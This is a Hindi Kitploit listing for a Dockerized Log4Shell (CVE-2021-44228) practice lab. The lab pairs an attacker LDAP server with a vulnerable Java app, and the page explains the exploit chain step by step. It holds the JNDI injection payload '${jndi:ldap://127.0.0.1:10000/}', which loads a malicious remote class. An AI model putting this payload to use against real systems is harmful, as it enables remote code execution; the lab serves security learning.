Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228_dockernize — # CVE-2021-44228 (Log4Shell) शोषण का सुरक्षित अभ्यास करने के लिए Dockerized लैब वातावरण। इसमें हमलावर LDAP सर्वर और कस्टम पेलोड परीक्षण के लिए कमजोर Java एप्लिकेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/qw3rtyou/cve-2021-44228_dockernize
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubqw3rtyou/cve-2021-44228_dockernize

CVE-2021-44228_dockernize

# CVE-2021-44228 (Log4Shell) शोषण का सुरक्षित अभ्यास करने के लिए Dockerized लैब वातावरण। इसमें हमलावर LDAP सर्वर और कस्टम पेलोड परीक्षण के लिए कमजोर Java एप्लिकेशन शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2021-44228 (Log4Shell) भेद्यता लैब वातावरण

परिचय

यह परियोजना CVE-2021-44228 (Log4Shell) के रूप में ज्ञात गंभीर Log4j भेद्यता को सुरक्षित रूप से अभ्यास करने और समझने के लिए एक डॉकराइज़्ड वातावरण प्रदान करती है।

मुख्य विशेषताएँ

  • सुरक्षित डॉकराइज़्ड परीक्षण वातावरण
  • कस्टम पेलोड परीक्षण क्षमता
  • हमलावर का LDAP सर्वर और भेद्य Java एप्लिकेशन शामिल है

आरंभ करना

root@kitploit:~
docker compose up --build

पेलोड परीक्षण

  1. आप /vulnerable/Makefile के परीक्षण अनुभाग में पेलोड को संशोधित कर सकते हैं
  2. डिफ़ॉल्ट पेलोड $${jndi:ldap://127.0.0.1:10000/} का उपयोग करता है

यह कैसे काम करता है

  1. भेद्य Java एप्लिकेशन प्रारंभ होता है
  2. हमलावर का LDAP सर्वर पोर्ट 10000 पर सुनता है
  3. भेद्य एप्लिकेशन चलता है
  4. Log4Shell पेलोड Makefile परीक्षण अनुभाग के माध्यम से भेद्य एप्लिकेशन में लॉग किया जाता है
  5. भेद्य एप्लिकेशन JNDI LDAP लुकअप का प्रयास करता है
  6. LDAP सर्वर एक दुर्भावनापूर्ण Java क्लास लौटाता है
  7. भेद्य एप्लिकेशन इस क्लास को लोड और निष्पादित करता है
टूल डाउनलोड करें